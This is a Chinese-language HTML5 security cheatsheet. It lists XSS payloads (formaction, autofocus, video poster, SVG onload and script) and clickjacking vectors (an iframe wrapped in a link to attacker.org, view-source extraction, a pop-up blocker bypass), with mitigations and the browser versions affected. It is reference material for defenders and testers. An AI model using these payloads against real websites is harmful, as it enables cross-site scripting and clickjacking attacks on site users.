# HTML5 Security Cheatsheet

## 1 通过formaction属性进行XSS- 需要用户进行交互(1)

这个向量展示了通过HTML5的`form`和`formaction`从外部劫持表单的一种方法。
```html
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
```
### Solution
不要让用户提交包含`form`和`formaction`属性的标签，避免在form中出现id属性及提交按钮。
### Demo
![](img/Screenshot_2017-05-19_上午7.02.52.png)
### 影响范围
- Firefox 4.0~
- Chrome 10.0~
- Safari 4.0.4~
- IE 10~

## 2 通过autofocus属性执行本身的focus事件
这个向量是使焦点自动跳到输入元素上，触发焦点事件-无需用户交互
```html
<input onfocus=alert(1) autofocus>
```
### Solution
检测用户提交的内容中是否含有"autofocus"属性
### Demo
![](img/Screenshot_2017-05-19_上午7.07.33.png)
### 影响范围
- Firefox 4.0~
- Safari 4.0~
- Chrome 4.0~
- IE 10.0~

## 3 通过autofocus竞争焦点来触发blur事件
！我了个擦，这样都行！
这里我们有两个HTML input元素竞争焦点，但焦点到另一个input元素时，前面那个将会触发blur事件。
```html
<input onblur=write(1) autofocus><input autofocus>
```
### Demo
![](img/3.html.gif)
![](img/3_1.html.gif)
### Solution
检测用户提交的内容中是否含有"autofocus"属性。
### 影响范围
- Safari 4.0~
- Chrome 4.0~
- 测试Firefox，发现也可以。

## 4 通过<video>的poster属性执行Javascript
Opera 10.5+ 的poster属性允许使用javascript:URI 这个bug在opera11中已修复
```html
<video poster=javascript:alert(1)//></video>
```
发现在Safari, Chrome, Firefox都不受影响。
### Solution
确保video的poster属性是相对URI、http URI和MIME-typed正确的data URI
### 影响范围
- Opera 10.5
- Opera 11.01

## 5 通过autofocus触发<body>的onscroll执行JavaScript。
这个payload是使用autofocus移开焦点的方式来移动滚动条，这样就触发了<body>的onscroll事件
```html
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
```
### Demo
![](img/5.html.gif)
</br>测试了一下，这个因为涉及到onscroll，所以得跟浏览器的窗口大小还有<br>的个数有关，如果<br>太少，则无法触发。
### 影响范围
- Safari 4.0~
- Chrome 4.0~
- Firefox 4.0~




## SVG的向量
SVG文件中可以通过任意元素的onload事件执行Javascript,且不需要用户交互
```html
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
```
### Demo
//TODO

### Solution
在上传时不能把SVG当图片处理,因为它可以包含任意HTML,且能被浏览器解析

## SVG文件通过<SCRIPT>标签执行js代码
SVG文件可以在任意SVG元素内部通过<script>标签强制浏览器执行js脚本，不需要用户交互。
```html
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
```
### Demo
![](img/Screenshot_2017-05-21_上午1.40.25.png)

### Solution
SVG文件不应该被当做图片来处理，尤其在上传文件的时候。SVG文件可以包含任意HTML数据以及本地元素的事件处理器
### 影响范围
- Safari 5.0~
- IE 9.0~
- Chrome 4.0~
- Firefox 3.X~

## 在没有其他SVG元素的情况下SVG元素可自动执行onload属性
在没有其他SVG元素的情况下SVG元素可自动执行onload属性。这可以作为非常短的XSS向量，在很多场景都很有用。
```html
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
```
### Demo
![](img/Screenshot_2017-05-21_上午1.52.38.png)
### Solution
其实算不上一个bug，这种行为是需要的，然后当然也增加了XSS的攻击面
### 影响范围
- Safari 3.4~
- IE 9.0~
- Chrome 4.0~
- Firefox 2.0~

## Firefox 解析SVG中被编码的HTML实体
Firefox 4允许HTML实体被用在纯文本标签中去表示他们原有的含义，例如style，nostyle，noframes和其他标签。
尽管HTML已经被编码，但是这一特性仍有可能导致绕过过滤，特别是在内联SVG和innerHTML的拷贝被使用时。这一bug已在最新的Firefox中修复。
### 影响范围
- Firefox 4.0

Clickjacking和UI Redressing的向量
-----------------
## Reverse clickjacking via <IFRAME>
IE允许在<A>标签内部放<IFRAME>标签。通过点击一个<IFRAME>内部的不可点击的元素，可以触发在<A>标签内的"href"属性的执行
```html
<a href="http://attacker.org"> 
<iframe src="http://example.org/"></iframe> 
</a>
```
### 影响范围
- IE 8.0
- IE 9.0

## 通过view-source来抽取内容 //TODO
> To show the source code of a web page inside the web browser Mozilla Firefox or Google Chrome, "view-source:" can be used as a prefix for the URL. Firefox - and that is essential for this vector - allows iframes to show view-source: URLs. With the combination of a "textarea" tag, just two drags to perform this attack are needed, as in the case of elements like images. The first drag is to select an element and the second to drag an element out of the iframe into the text area. This method also bypasses CSS and JS based clickjacking protection.

在Firefox或者Chrome中查看网页源码可以指定url前缀: `view-source:`。这个向量的关键在于Firefox浏览器，允许在iframe中使用`view-source:`来查看源码。通过与"textarea"标签结合，
```html
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>  
<textarea type="text" cols="50" rows="10"></textarea>
```

### 影响范围
- Firefox 2.X~13.0


## Pop-up blocker bypass //TODO
> A web browser like Firefox distinguishes between trusted and not trusted events, depending on the situation. User interactions like a click will be trusted for the reason that they are made explicitly by the user. If a web page initiates an event like opening a pop-up window automatically, the event is not trusted and therefore blocked. Tests have shown that other browsers like Google Chrome or Opera behave similarly. With the use of clickjacking techniques, an attacker can get its victim to create a trusted event by clicking on a link that opens one or more pop-up windows.  Thus, an attacker can get the victim to unknowingly trigger a trusted event by doing a click. This event can be recycled by an attacker for later usage or directly used to e.g. generate pop-up windows that the user does not desire.


```html
<script> 
function makePopups(){ 
	for (i=1;i<6;i++) { 
		window.open('popup.html','spam'+i,'width=50,height=50'); 
	} 
} 
</script>  
<body> <a href="#" onclick="makePopups()">Spam</a>
```
### 影响范围
- IE 5.0~9.0
- Firefox 2.X~
- Chrome 6.0~23.0
- Safari 5.0~5.1.7

